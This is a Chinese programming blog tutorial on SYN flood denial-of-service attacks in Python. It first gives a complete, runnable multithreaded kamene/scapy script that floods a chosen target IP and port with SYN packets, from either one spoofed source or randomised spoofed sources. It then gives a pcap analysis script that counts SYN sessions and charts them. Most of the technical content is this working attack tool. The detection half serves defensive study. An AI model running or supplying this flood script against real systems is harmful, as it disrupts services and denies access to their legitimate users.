Python网络编程8-实现SYN Flood攻击与图形化展示

一、Dos简介

  最基本的DoS攻击就是攻击者利用大量合理的服务请求来占用攻击目标过多的服务资源,从而使合法用户无法得到服务的响应。DoS攻击一般是采用一对一方式的,当攻击目标各项性能指标不高时(例如CPU速度低、内存小或者网络带宽小等等),它的效果是明显的。
  泛洪攻击(Flood)
  指攻击者通过僵尸网络、代理或直接向攻击目标发送大量的伪装的请求服务报文,最终耗尽攻击目标的资源。发送的大量报文可以是TCP的SYN和ACK报文、UDP报文、ICMP报文、DNS报文HTTP/HTTPS报文等。

二、Python实现SYN Flood攻击

  以下Python脚本可实现简易的SYN Flood攻击

#!/usr/bin/python3
# -*- coding=utf-8 -*-
from kamene.all import *
import random,time,threading

def Single_IP_port_dos(source_IP,target_IP,dst_port,timeout=60,ifname="ens37"):
    '''单IP单端口'''
    source_port = int(random.randint(1, 65535))
    timeout_start = time.time()
    i = 1
    while time.time() < timeout_start + timeout:
        IP1 = IP(src=source_IP, dst=target_IP)
        TCP1 = TCP(sport=source_port, dport=dst_port)
        pkt = IP1 / TCP1
        send(pkt, iface=ifname,inter=.001,)# inter 参数指定在两个数据包之间等待的时间间隔(以秒为单位)
        print(pkt.summary())
        # print("packet sent ", i)
        # i = i + 1

def Multiple_IP_port_dos(target_IP,dst_port,timeout=60,ifname="ens37"):
    '''多IP多端口'''
    timeout_start = time.time()
    i = 1
    while time.time() < timeout_start + timeout:
        a = str(random.randint(1, 254))
        b = str(random.randint(1, 254))
        c = str(random.randint(1, 254))
        d = str(random.randint(1, 254))
        dot = "."
        source_IP = a + dot + b + dot + c + dot + d
        source_port = int(random.randint(1, 65535))
        IP1 = IP(src=source_IP, dst=target_IP)
        TCP1 = TCP(sport=source_port, dport=dst_port)
        pkt = IP1 / TCP1
        send(pkt, iface=ifname, inter=.001)
        print(pkt.summary())
        # print("packet sent ", i)
        # i = i + 1
def dos_thread(choice,*args):
    '''多线程发送'''
    n = int(input("Enter Number of threads:"))
    while True:
        try :
            t_obj = []
            for j in range(n):
                if choice == "1":
                    t = threading.Thread(target=Single_IP_port_dos, args=(source_IP, target_IP, dst_port, timeout, ifname))
                elif choice == "2":
                    t = threading.Thread(target=Multiple_IP_port_dos, args=(target_IP, dst_port, timeout, ifname))
                t.start()
                t_obj.append(t)
            for z in t_obj:
                z.join()
        except Exception:
            print("输入有误!!")
            pass
        choice2 = input("Dos is done,contune? Y/N>>")
        if choice2 == "Y" or choice2 == "y":
            continue
        elif choice2 == "N" or choice2 == "n":
            break
        else:
            print("输入错误!!")

if __name__ =="__main__":
    while True:
        print('''
        ----可选模式----
        1:单IP单端口
        2:多IP多端口 
        q: 退出
        ''')
        choice=input("选择模式>>>")
        if choice == '1':
            source_IP = input("Enter IP address of Source: ")
            target_IP = input("Enter IP address of Target: ")
            dst_port = int(input("Enter port of target: "))
            timeout = int(input("Enter run time:"))
            ifname = input("Enter ifname:")
            dos_thread(choice, source_IP,target_IP,dst_port,timeout,ifname)
        elif choice == '2':
            target_IP = input("Enter IP address of Target: ")
            dst_port = int(input("Enter port of target: "))
            timeout = int(input("Enter run time:"))
            ifname = input("Enter ifname:")
            dos_thread(choice,target_IP,timeout,ifname)
        elif choice == 'q':
            break
        else:
            print("输入错误!!")

运行结果如下


image.png

image.png

使用Wirshark观察如下,产生大量TCP syn包;由于使用单IP单端口发送时,scapy使用了相同TCP序列号和数据,Wirshark认为是TCP重传,使用多IP多端口是则正常。


image.png

三、对SYN Flood攻击进行图形化展示

以下Python脚本可对捕获的SYN Flood包进行分析,并展示出数量大于5的连接。

#!/usr/bin/python3
# -*- coding=utf-8 -*-
from kamene.all import *
from matplotlib import pyplot as plt

def find_pcap_syn_dos(pcap_filename):
    ''' 对会话(源,目,目的端口)统计会话数量,用于判断dos攻击'''
    pkts_file = rdpcap(pcap_filename)#使用scapy的rdpcap函数打开pcap文件
    pkt_list = pkts_file.res #提取每一个包到清单pkt_list
    dos_dict= {} #最后的结果写入dos_dict
    for packet in pkt_list:
        try:
            if packet.getlayer(TCP).fields["flags"] == 2: #SYN包
                source_ip = packet.getlayer(IP).fields['src'] #提取源地址
                destination_ip = packet.getlayer(IP).fields["dst"] #提取目的地址
                destination_port = packet.getlayer(TCP).fields['dport'] #提取目的端口号
                conn = source_ip,destination_ip,destination_port #用源地址,目的地址和目的端口产生元组
                conn_counts = dos_dict.get(conn,0) #判断是否有这个键值,没有就返回0
                dos_dict[conn] = conn_counts + 1 # 在返回值的基础加1
        except Exception as e:
            #print("Error:",e)
            pass
    return dos_dict
def show_dos(conn_num_list):
    conn_list = []
    num_list = []
    for c, n in conn_num_list:
        conn_list.append(str(c))
        num_list.append(n)
    print(conn_list)
    print(num_list)
    plt.figure(figsize=(10, 6), dpi=80)  # 设置图像大小,像素密度
    plt.barh(conn_list, num_list, height=0.5)
    plt.rcParams['font.sans-serif'] = ['SimHei']  # 设置中文
    plt.title("SYN Dos分析")  # 主题
    plt.xlabel("数量")  # x轴注释
    plt.ylabel("连接")  # Y轴注释
    plt.show()

if __name__ == "__main__":

    dos_result = find_pcap_syn_dos("dos_test.pcap")
    # 提取数量大于5的连接
    conn_num_list= sorted([[conn,num] for conn,num in dos_result.items() if num >= 5],key=lambda x: x[1])
    show_dos(conn_num_list)

运行结果如下
首先会打印出数量大于5的连接与其对应的数量。


image.png

同时会生成对应图表,可以直观的看到攻击目标主机和端口的源IP排名。


SYN Foold
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 217,734评论 6 505
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,931评论 3 394
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 164,133评论 0 354
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,532评论 1 293
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,585评论 6 392
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,462评论 1 302
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,262评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,153评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,587评论 1 314
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,792评论 3 336
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,919评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,635评论 5 345
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,237评论 3 329
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,855评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,983评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,048评论 3 370
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,864评论 2 354

推荐阅读更多精彩内容